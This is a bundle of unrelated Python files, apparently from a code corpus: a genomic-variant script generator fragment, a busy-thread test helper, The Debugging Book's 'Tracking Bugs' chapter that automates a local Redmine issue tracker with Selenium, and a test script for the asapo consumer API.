vcf_paths = ddd_prod_connect_and_fetch(get_all_current_vcfs_sql_statement, user_settings_dict)
ind = list(range(0,len(vcf_paths),500))
ind[-1] = len(vcf_paths) ## replace last index by length of list
for i in range(0, len(ind)-1):
multiprocessing.Process(target=mp_func, args=(ind[i], ind[i+1])).start()
json_dict['error_msgs'] = 'No_error'
with open(remote_dir+'cohort_variants.json', 'w') as out:
json.dump(json_dict, out)
except:
json_dict['error_msgs'] = 'Error'
with open(remote_dir+'cohort_variants.json', 'w') as out:
json.dump(json_dict, out)
""".format(builder_backend_dir=backend_dir, builder_chrom=chrom, builder_start=start, builder_stop=stop, builder_cq=cq, builder_max_af_cutoff=max_af_cutoff, builder_max_af_value=max_af_value, builder_string_user_settings_dict=string_user_settings_dict)
## add the function and class definitions
with open('{}local_scripts/parsing_setups.py'.format(gui_path), 'r') as defins:
defins = defins.read()
## write current_run.py
with open(out, 'w') as outfile:
outfile.write('\n'.join([defins, template]))
|
threaded_busy.py
|
# Copyright 2016 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
def do_sleep():
while True:
pass
def main():
sys.stdout.write('%d\n' % (os.getpid(), ))
sys.stdout.flush()
thread = threading.Thread(target=do_sleep)
thread.start()
do_sleep()
if __name__ == '__main__':
main()
|
Tracking.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Tracking Bugs" - a chapter of "The Debugging Book"
# Web site: https://www.debuggingbook.org/html/Tracking.html
# Last change: 2022-01-17 14:10:37+01:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Debugging Book - Tracking Bugs
This file can be _executed_ as a script, running all experiments:
$ python Tracking.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from debuggingbook.Tracking import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.debuggingbook.org/html/Tracking.html
This chapter provides no functionality that could be used by third-party code.
For more details, source, and documentation, see
"The Debugging Book - Tracking Bugs"
at https://www.debuggingbook.org/html/Tracking.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'debuggingbook'
# Tracking Bugs
# =============
if __name__ == '__main__':
print('# Tracking Bugs')
if __name__ == '__main__':
from .bookutils import YouTubeVideo
YouTubeVideo("bJzHYzvxHm8")
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from . import Intro_Debugging
import os
import sys
if __name__ == '__main__':
if 'CI' in os.environ:
# Can't run this in our continuous environment,
# since it can't run a headless Web browser
sys.exit(0)
if __name__ == '__main__':
assert os.getenv('USER') == 'zeller'
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Reporting Issues
## ----------------
if __name__ == '__main__':
print('\n## Reporting Issues')
### What Goes in a Bug Report?
if __name__ == '__main__':
print('\n### What Goes in a Bug Report?')
#### Steps to Reproduce (83%)
if __name__ == '__main__':
print('\n#### Steps to Reproduce (83%)')
#### Stack Traces (57%)
if __name__ == '__main__':
print('\n#### Stack Traces (57%)')
#### Test Cases (51%)
if __name__ == '__main__':
print('\n#### Test Cases (51%)')
#### Observed Behavior (33%)
if __name__ == '__main__':
print('\n#### Observed Behavior (33%)')
#### Screenshots (26%)
if __name__ == '__main__':
print('\n#### Screenshots (26%)')
#### Expected Behavior (22%)
if __name__ == '__main__':
print('\n#### Expected Behavior (22%)')
#### Configuration Information (< 12%)
if __name__ == '__main__':
print('\n#### Configuration Information (< 12%)')
### Reporting Crashes Automatically
if __name__ == '__main__':
print('\n### Reporting Crashes Automatically')
### Effective Issue Reporting
if __name__ == '__main__':
print('\n### Effective Issue Reporting')
## An Issue Tracker
## ----------------
if __name__ == '__main__':
print('\n## An Issue Tracker')
### Excursion: Setting up Redmine
if __name__ == '__main__':
print('\n### Excursion: Setting up Redmine')
import subprocess
import os
import sys
def with_ruby(cmd: str, inp: str = '', timeout: int = 30, show_stdout: bool = False) -> None:
print(f"$ {cmd}")
shell = subprocess.Popen(['/bin/sh', '-c',
f'''rvm_redmine=$HOME/.rvm/gems/ruby-2.7.2@redmine; \
rvm_global=$HOME/.rvm/gems/ruby-2.7.2@global; \
export GEM_PATH=$rvm_redmine:$rvm_global; \
export PATH=$rvm_redmine/bin:$rvm_global/bin:$HOME/.rvm/rubies/ruby-2.7.2/bin:$HOME/.rvm/bin:$PATH; \
cd $HOME/lib/redmine && {cmd}'''],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
try:
stdout_data, stderr_data = shell.communicate(inp, timeout=timeout)
except subprocess.TimeoutExpired:
shell.kill()
# stdout_data, stderr_data = shell.communicate(inp)
# if show_stdout:
# print(stdout_data, end="")
# print(stderr_data, file=sys.stderr, end="")
raise
print(stderr_data, file=sys.stderr, end="")
if show_stdout:
print(stdout_data, end="")
def with_mysql(cmd: str, timeout: int = 2, show_stdout: bool = False) -> None:
print(f"sql>{cmd}")
sql = subprocess.Popen(["mysql", "-u", "root",
"--default-character-set=utf8mb4"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
try:
stdout_data, stderr_data = sql.communicate(cmd + ';',
timeout=timeout)
except subprocess.TimeoutExpired:
sql.kill()
# stdout_data, stderr_data = sql.communicate(inp)
# if show_stdout:
# print(stdout_data, end="")
# print(stderr_data, file=sys.stderr, end="")
raise
print(stderr_data, file=sys.stderr, end="")
if show_stdout:
print(stdout_data, end="")
if __name__ == '__main__':
with_ruby("bundle config set without development test")
if __name__ == '__main__':
with_ruby("bundle install")
if __name__ == '__main__':
with_ruby("pkill sql; sleep 5")
if __name__ == '__main__':
try:
with_ruby("mysql.server start", show_stdout=True)
except subprocess.TimeoutExpired:
pass # Can actually start without producing output
if __name__ == '__main__':
with_mysql("drop database redmine")
if __name__ == '__main__':
with_mysql("drop user 'redmine'@'localhost'")
if __name__ == '__main__':
with_mysql("create database redmine character set utf8")
if __name__ == '__main__':
with_mysql("create user 'redmine'@'localhost' identified by 'my_password'")
if __name__ == '__main__':
with_mysql("grant all privileges on redmine.* to 'redmine'@'localhost'")
if __name__ == '__main__':
with_ruby("bundle exec rake generate_secret_token")
if __name__ == '__main__':
with_ruby("RAILS_ENV=production bundle exec rake db:migrate")
if __name__ == '__main__':
with_ruby("RAILS_ENV=production bundle exec rake redmine:load_default_data", '\n')
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Starting Redmine
if __name__ == '__main__':
print('\n### Excursion: Starting Redmine')
import os
import time
from multiprocess import Process # type: ignore
from typing import Tuple
def run_redmine(port: int) -> None:
with_ruby(f'exec rails s -e production -p {port} > redmine.log 2>&1',
timeout=3600)
def start_redmine(port: int = 3000) -> Tuple[Process, str]:
process = Process(target=run_redmine, args=(port,))
process.start()
time.sleep(5)
url = f"http://localhost:{port}"
return process, url
if __name__ == '__main__':
redmine_process, redmine_url = start_redmine()
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Remote Control with Selenium
if __name__ == '__main__':
print('\n### Excursion: Remote Control with Selenium')
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
BROWSER = 'firefox'
if __name__ == '__main__':
with_ruby("pkill Firefox.app firefox-bin")
from .bookutils import rich_output
HEADLESS = True
from selenium.webdriver.remote.webdriver import WebDriver
def start_webdriver(browser: str = BROWSER, headless: bool = HEADLESS, zoom: float = 4.0) -> WebDriver:
if browser == 'firefox':
options = webdriver.FirefoxOptions()
if browser == 'chrome':
options = webdriver.ChromeOptions()
if headless and browser == 'chrome':
options.add_argument('headless')
else:
options.headless = headless
# Start the browser, and obtain a _web driver_ object such that we can interact with it.
if browser == 'firefox':
# For firefox, set a higher resolution for our screenshots
profile = webdriver.firefox.firefox_profile.FirefoxProfile()
profile.set_preference("layout.css.devPixelsPerPx", repr(zoom))
redmine_gui = webdriver.Firefox(firefox_profile=profile, options=options)
# We set the window size such that it fits
redmine_gui.set_window_size(500, 600) # was 1024, 600
elif browser == 'chrome':
redmine_gui = webdriver.Chrome(options=options)
redmine_gui.set_window_size(1024, 510 if headless else 640)
return redmine_gui
if __name__ == '__main__':
redmine_gui = start_webdriver(browser=BROWSER, headless=HEADLESS)
if __name__ == '__main__':
redmine_gui.get(redmine_url)
if __name__ == '__main__':
from IPython.display import display, Image
if __name__ == '__main__':
Image(redmine_gui.get_screenshot_as_png())
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Screenshots with Drop Shadows
if __name__ == '__main__':
print('\n### Excursion: Screenshots with Drop Shadows')
import tempfile
def drop_shadow(contents: bytes) -> bytes:
with tempfile.NamedTemporaryFile() as tmp:
tmp.write(contents)
convert = subprocess.Popen(
['convert', tmp.name,
'(', '+clone', '-background', 'black', '-shadow', '50x10+15+15', ')',
'+swap', '-background', 'none', '-layers', 'merge', '+repage', '-'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_data, stderr_data = convert.communicate()
if stderr_data:
print(stderr_data.decode("utf-8"), file=sys.stderr, end="")
return stdout_data
def screenshot(driver: WebDriver, width: int = 500) -> bytes:
return Image(drop_shadow(redmine_gui.get_screenshot_as_png()), width=width)
if __name__ == '__main__':
screenshot(redmine_gui)
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: First Registration at Redmine
if __name__ == '__main__':
print('\n### Excursion: First Registration at Redmine')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/login')
if __name__ == '__main__':
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_id("username").send_keys("admin")
redmine_gui.find_element_by_id("password").send_keys("admin")
redmine_gui.find_element_by_name("login").click()
if __name__ == '__main__':
time.sleep(2)
if __name__ == '__main__':
if redmine_gui.current_url.endswith('my/password'):
redmine_gui.get(redmine_url + '/my/password')
redmine_gui.find_element_by_id("password").send_keys("admin")
redmine_gui.find_element_by_id("new_password").send_keys("admin001")
redmine_gui.find_element_by_id("new_password_confirmation").send_keys("admin001")
display(screenshot(redmine_gui))
redmine_gui.find_element_by_name("commit").click()
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/logout')
redmine_gui.find_element_by_name("commit").click()
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/login')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_id("username").send_keys("admin")
redmine_gui.find_element_by_id("password").send_keys("admin001")
redmine_gui.find_element_by_name("login").click()
screenshot(redmine_gui)
### Excursion: Creating a Project
if __name__ == '__main__':
print('\n### Excursion: Creating a Project')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/new')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/new')
redmine_gui.find_element_by_id('project_name').send_keys("The Debugging Book")
redmine_gui.find_element_by_id('project_description').send_keys("A Book on Automated Debugging")
redmine_gui.find_element_by_id('project_identifier').clear()
redmine_gui.find_element_by_id('project_identifier').send_keys("debuggingbook")
redmine_gui.find_element_by_id('project_homepage').send_keys("https://www.debuggingbook.org/")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_name('commit').click()
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects')
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/debuggingbook')
screenshot(redmine_gui)
## Reporting an Issue
## ------------------
if __name__ == '__main__':
print('\n## Reporting an Issue')
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/issues/new')
screenshot(redmine_gui)
if __name__ == '__main__':
issue_title = "Does not render correctly on Nokia Communicator"
if __name__ == '__main__':
issue_description = \
"""The Debugging Book does not render correctly on the Nokia Communicator 9000.
Steps to reproduce:
1. On the Nokia, go to "https://debuggingbook.org/"
2. From the menu on top, select the chapter "Tracking Origins".
3. Scroll down to a place where a graph is supposed to be shown.
4. Instead of the graph, only a blank space is displayed.
How to fix:
* The graphs seem to come as SVG elements, but the Nokia Communicator does not support SVG rendering. Render them as JPEGs instead.
"""
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/issues/new')
redmine_gui.find_element_by_id('issue_subject').send_keys(issue_title)
redmine_gui.find_element_by_id('issue_description').send_keys(issue_description)
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_id('issue_assigned_to_id').click()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_name('commit').click()
screenshot(redmine_gui)
from .bookutils import quiz
if __name__ == '__main__':
quiz("How many issues have been reported over time in Mozilla Bugzilla?",
[
"More than ten thousand",
"More than a hundred thousand",
"More than a million",
"More than ten million"
], '370370367 // 123456789')
if __name__ == '__main__':
redmine_gui.get("https://bugzilla.mozilla.org/buglist.cgi?quicksearch=firefox")
if __name__ == '__main__':
screenshot(redmine_gui)
### Excursion: Adding Some More Issue Reports
if __name__ == '__main__':
print('\n### Excursion: Adding Some More Issue Reports')
def new_issue(issue_title: str, issue_description: str) -> bytes:
redmine_gui.get(redmine_url + '/issues/new')
redmine_gui.find_element_by_id('issue_subject').send_keys(issue_title)
redmine_gui.find_element_by_id('issue_description').send_keys(issue_description)
redmine_gui.find_element_by_name('commit').click()
return screenshot(redmine_gui)
if __name__ == '__main__':
new_issue("Missing a Chapter on Parallel Debugging",
"""I am missing a chapter on (automatic) debugging of parallel and distributed systems,
including how to detect and repair data races, log message passing, and more.
In my experience, almost all programs are parallel today, so you are missing
an important subject.
""")
if __name__ == '__main__':
new_issue("Missing a PDF version",
"""Your 'book' does not provide a printed version. I think that printed books
* offer a more enjoyable experience for the reader
* allow me to annotate pages with my own remarks
* allow me to set dog-ear bookmatks
* allow me to show off what I'm currently reading (do you have a cover, too?)
Please provide a printed version - or, at least, produce a PDF version
of the debugging book, and make it available for download, such that I can print it myself.
""")
if __name__ == '__main__':
new_issue("No PDF version",
"""Can I have a printed version of your book? Please!""")
if __name__ == '__main__':
new_issue("Does not work with Python 2.7 or earlier",
"""I was deeply disappointed that your hew book requires Python 3.9 or later.
There are still several Python 2.x users out here (I, for one, cannot stand having to
type parentheses for every `print` statement), and I would love to run your code on
my Python 2.7 programs.
Would it be possible to backport the book's code such that it would run on Python 3.x
as well as Python 2.x? I would suggest that you add simple checks around your code
such as the following:
```
import sys
if sys.version_info.major >= 3:
print("The result is", x)
else:
print "The result is", x
```
As an alternative, rewrite the book in Python 2 and have it automatically translate to
Python 3. This way, you could address all Python lovers, not just Python 3 ones.
""")
if __name__ == '__main__':
new_issue("Support for C++",
"""I had lots of fun with your 'debugging book'. Yet, I was somewhat disappointed
to see that all code examples are in and for Python programs only. Is there a chance
to get them to work on a real programming language such as C or C++? This would also
open the way to discuss several new debugging techniques for bugs that occur in these
languages only. A chapter on C++ move semantics, and how to fix them, for instance,
would be highly appreciated.
""")
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
## Managing Issues
## ---------------
if __name__ == '__main__':
print('\n## Managing Issues')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/projects/debuggingbook")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + '/projects/debuggingbook/issues')
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//tr[@id='issue-2']//a[@title='Actions']").click()
time.sleep(0.25)
if __name__ == '__main__':
tracker_item = redmine_gui.find_element_by_xpath(
"//div[@id='context-menu']//a[text()='Tracker']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(tracker_item)
actions.perform()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='Feature']").click()
def mark_tracker(issue: int, tracker: str) -> None:
redmine_gui.get(redmine_url + "/issues/")
redmine_gui.find_element_by_xpath(
f"//tr[@id='issue-{str(issue)}']//a[@title='Actions']").click()
time.sleep(0.25)
tracker_item = redmine_gui.find_element_by_xpath(
"//div[@id='context-menu']//a[text()='Tracker']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(tracker_item)
actions.perform()
time.sleep(0.25)
redmine_gui.find_element_by_xpath(
f"//div[@id='context-menu']//a[text()='{tracker}']").click()
if __name__ == '__main__':
mark_tracker(3, "Feature")
mark_tracker(4, "Feature")
mark_tracker(6, "Feature")
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
## Assigning Priorities
## --------------------
if __name__ == '__main__':
print('\n## Assigning Priorities')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//tr[@id='issue-1']//a[@title='Actions']").click()
time.sleep(0.25)
if __name__ == '__main__':
priority_item = redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='Priority']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(priority_item)
actions.perform()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='Urgent']").click()
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
## Assigning Issues
## ----------------
if __name__ == '__main__':
print('\n## Assigning Issues')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/")
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//tr[@id='issue-1']//a[@title='Actions']").click()
time.sleep(0.25)
if __name__ == '__main__':
assignee_item = redmine_gui.find_element_by_xpath(
"//div[@id='context-menu']//a[text()='Assignee']")
actions = webdriver.ActionChains(redmine_gui)
actions.move_to_element(assignee_item)
actions.perform()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//div[@id='context-menu']//a[text()='<< me >>']").click()
screenshot(redmine_gui)
## Resolving Issues
## ----------------
if __name__ == '__main__':
print('\n## Resolving Issues')
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/projects/debuggingbook/issues?query_id=1")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/1")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/1/edit")
redmine_gui.find_element_by_id("issue_status_id").click()
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//option[text()='Resolved']").click()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
issue_notes = redmine_gui.find_element_by_id("issue_notes")
issue_notes.send_keys("Will only work for Nokia Communicator Rev B and later; "
"Rev A is still unsupported")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_name("commit").click()
screenshot(redmine_gui)
## The Life Cycle of an Issue
## --------------------------
if __name__ == '__main__':
print('\n## The Life Cycle of an Issue')
### Resolutions
if __name__ == '__main__':
print('\n### Resolutions')
#### FIXED
if __name__ == '__main__':
print('\n#### FIXED')
#### INVALID
if __name__ == '__main__':
print('\n#### INVALID')
#### WONTFIX
if __name__ == '__main__':
print('\n#### WONTFIX')
#### DUPLICATE
if __name__ == '__main__':
print('\n#### DUPLICATE')
#### WORKSFORME
if __name__ == '__main__':
print('\n#### WORKSFORME')
### An Issue Life Cycle
if __name__ == '__main__':
print('\n### An Issue Life Cycle')
from .Intro_Debugging import graph # minor dependency
if __name__ == '__main__':
from IPython.display import display
if __name__ == '__main__':
life_cycle = graph()
life_cycle.attr(rankdir='TB')
life_cycle.node('New', label="<<b>NEW</b>>", penwidth='2.0')
life_cycle.node('Assigned', label="<<b>ASSIGNED</b>>")
with life_cycle.subgraph() as res:
res.attr(rank='same')
res.node('Resolved', label="<<b>RESOLVED</b>>", penwidth='2.0')
res.node('Resolution',
shape='plain',
fillcolor='white',
label="""<<b>Resolution:</b> One of<br align="left"/>
• FIXED<br align="left"/>
• INVALID<br align="left"/>
• DUPLICATE<br align="left"/>
• WONTFIX<br align="left"/>
• WORKSFORME<br align="left"/>
>""")
res.node('Reopened', label="<<b>REOPENED</b>>", style='invis')
life_cycle.edge('New', 'Assigned', label=r"Assigned\lto developer")
life_cycle.edge('Assigned', 'Resolved', label="Developer has fixed bug")
life_cycle.edge('Resolution', 'Resolved', arrowhead='none', style='dashed')
life_cycle
if __name__ == '__main__':
life_cycle.node('Unconfirmed', label="<<b>UNCONFIRMED</b>>", penwidth='2.0')
# life_cycle.node('Verified', label="<<b>VERIFIED</b>>")
life_cycle.node('Closed', label="<<b>CLOSED</b>>", penwidth='2.0')
life_cycle.node('Reopened', label="<<b>REOPENED</b>>", style='filled')
life_cycle.node('New', label="<<b>NEW</b>>", penwidth='1.0')
life_cycle.edge('Unconfirmed', 'New', label="Confirmed as \"new\"")
life_cycle.edge('Unconfirmed', 'Closed', label=r"Resolved\las \"invalid\"\lor \"duplicate\"")
life_cycle.edge('Assigned', 'New', label="Unassigned")
life_cycle.edge('Resolved', 'Closed', label=r"Quality Assurance\lconfirms fix")
life_cycle.edge('Resolved', 'Reopened', label=r"Quality Assurance\lnot satisfied")
life_cycle.edge('Reopened', 'Assigned', label=r"Assigned\lto developer")
# life_cycle.edge('Verified', 'Closed', label="Bug is closed")
life_cycle.edge('Closed', 'Reopened', label=r"Bug is\lreopened")
life_cycle
if __name__ == '__main__':
redmine_process.terminate()
redmine_gui.close()
if __name__ == '__main__':
os.system("pkill ruby");
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
|
consumer_api.py
|
from __future__ import print_function
import asapo_consumer
import json
import sys
import time
from threading import Thread
thread_res = 0
def exit_on_noerr(name):
print(name)
sys.exit(1)
def assert_metaname(meta, compare, name):
print("asserting meta for " + name)
if meta['name'] != compare:
print("error at " + name)
print('meta: ', json.dumps(meta, indent=4, sort_keys=True))
sys.exit(1)
def assert_usermetadata(meta, name):
print("asserting usermetadata for " + name)
if meta['meta']['test'] != 10:
print('meta: ', json.dumps(meta, indent=4, sort_keys=True))
print("error at " + name)
print('meta: ', json.dumps(meta, indent=4, sort_keys=True))
sys.exit(1)
def assert_version(version):
print("asserting version ",version)
ok = version['supported'] and version['client'] and version['server']
if not ok:
sys.exit(1)
def assert_eq(val, expected, name):
print("asserting eq for " + name)
if val != expected:
print("error at " + name)
print('val: ', val, ' expected: ', expected)
sys.exit(1)
def check_file_transfer_service(consumer, group_id):
consumer.set_timeout(1000)
data, meta = consumer.get_by_id(1,stream = "stream1", meta_only=False)
assert_eq(data.tostring().decode("utf-8"), "hello1", "check_file_transfer_service ok")
data, meta = consumer.get_by_id(1, meta_only=False, stream = "streamfts")
assert_eq(data.tostring().decode("utf-8"), "hello1", "check_file_transfer_service with auto size ok")
def check_single(consumer, group_id):
global thread_res
version = consumer.get_version_info()
assert_version(version)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next1")
assert_usermetadata(meta, "get next1")
consumer.set_timeout(1000)
data = consumer.retrieve_data(meta)
assert_eq(data.tostring().decode("utf-8"), "hello1", "retrieve_data data")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "2", "get next2")
assert_usermetadata(meta, "get next2")
_, meta = consumer.get_last(meta_only=True)
assert_metaname(meta, "5", "get last1")
assert_usermetadata(meta, "get last1")
# get last in group
_, meta = consumer.get_last(meta_only=True,group_id=group_id)
assert_metaname(meta, "5", "get last in group")
try:
consumer.get_last(meta_only=True,group_id=group_id)
except asapo_consumer.AsapoEndOfStreamError:
pass
else:
exit_on_noerr("get last in group error second time")
try:
consumer.get_by_id(30, meta_only=True)
except asapo_consumer.AsapoEndOfStreamError:
pass
else:
exit_on_noerr("get_by_id no data")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "3", "get next3")
size = consumer.get_current_size()
assert_eq(size, 5, "get_current_size")
try:
size = consumer.get_current_dataset_count(include_incomplete = True)
except asapo_consumer.AsapoWrongInputError as err:
pass
else:
exit_on_noerr("get_current_dataset_count for single messages err")
consumer.reset_lastread_marker(group_id)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next4")
assert_usermetadata(meta, "get next4")
_, meta = consumer.get_by_id(3, meta_only=True)
assert_metaname(meta, "3", "get get_by_id")
assert_usermetadata(meta, "get get_by_id")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "2", "get next5")
assert_usermetadata(meta, "get next5")
consumer.set_lastread_marker(group_id,4)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "5", "get next6")
assert_usermetadata(meta, "get next6")
try:
consumer.get_last(meta_only=False)
except asapo_consumer.AsapoLocalIOError as err:
print(err)
pass
else:
exit_on_noerr("io error")
_, meta = consumer.get_next(group_id, meta_only=True, stream = "stream1")
assert_metaname(meta, "11", "get next stream1")
_, meta = consumer.get_next(group_id, meta_only=True, stream = "stream2")
assert_metaname(meta, "21", "get next stream2")
streams = consumer.get_stream_list("","all")
assert_eq(len(streams), 4, "number of streams")
print(streams)
assert_eq(streams[0]["name"], "default", "streams_name1")
assert_eq(streams[0]["finished"], False, "streams_finished1")
assert_eq(streams[1]["name"], "streamfts", "streams_name2")
assert_eq(streams[2]["name"], "stream1", "streams_name2")
assert_eq(streams[3]["name"], "stream2", "streams_name3")
assert_eq(streams[1]["timestampCreated"], 1000, "streams_timestamp2")
assert_eq(streams[2]["timestampLast"], 2000, "streams_timestamplast2")
assert_eq(streams[2]["finished"], True, "streams_finished2")
assert_eq(streams[2]["nextStream"], "ns", "next stream 2")
assert_eq(streams[2]["lastId"], 5, "last id stream 2")
assert_eq(streams[3]["finished"], True, "streams_finished3")
assert_eq(streams[3]["nextStream"], "", "next stream 3")
assert_eq(streams[3]["lastId"], 5, "last id stream 3")
finished_streams = consumer.get_stream_list("","finished")
assert_eq(len(finished_streams), 2, "number of finished streams")
assert_eq(finished_streams[0]["name"], "stream1", "finished streams_name1")
unfinished_streams = consumer.get_stream_list("","unfinished")
assert_eq(len(unfinished_streams), 2, "number of unfinished streams")
assert_eq(unfinished_streams[0]["name"], "default", "unfinished streams_name1")
# acks
try:
id = consumer.get_last_acknowledged_message(group_id)
except asapo_consumer.AsapoNoDataError as err:
print(err)
pass
else:
exit_on_noerr("get_last_acknowledged_message")
nacks = consumer.get_unacknowledged_messages(group_id)
assert_eq(len(nacks), 5, "nacks default stream size = 5")
consumer.acknowledge(group_id, 1)
try:
consumer.acknowledge(group_id, 1)
except asapo_consumer.AsapoWrongInputError as err:
print(err)
pass
else:
exit_on_noerr("should be wrong input on second ack")
nacks = consumer.get_unacknowledged_messages(group_id)
assert_eq(len(nacks), 4, "nacks default stream size = 4")
id = consumer.get_last_acknowledged_message(group_id)
assert_eq(id, 1, "last ack default stream id = 1")
consumer.acknowledge(group_id, 1, "stream1")
nacks = consumer.get_unacknowledged_messages(group_id)
assert_eq(len(nacks), 4, "nacks stream1 size = 4 after ack")
# neg acks
consumer.reset_lastread_marker(group_id)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next neg ack before resend")
consumer.reset_lastread_marker(group_id)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next neg ack with resend")
# resend
consumer.reset_lastread_marker(group_id)
consumer.set_resend_nacs(True, 0, 1)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next before resend")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next with resend")
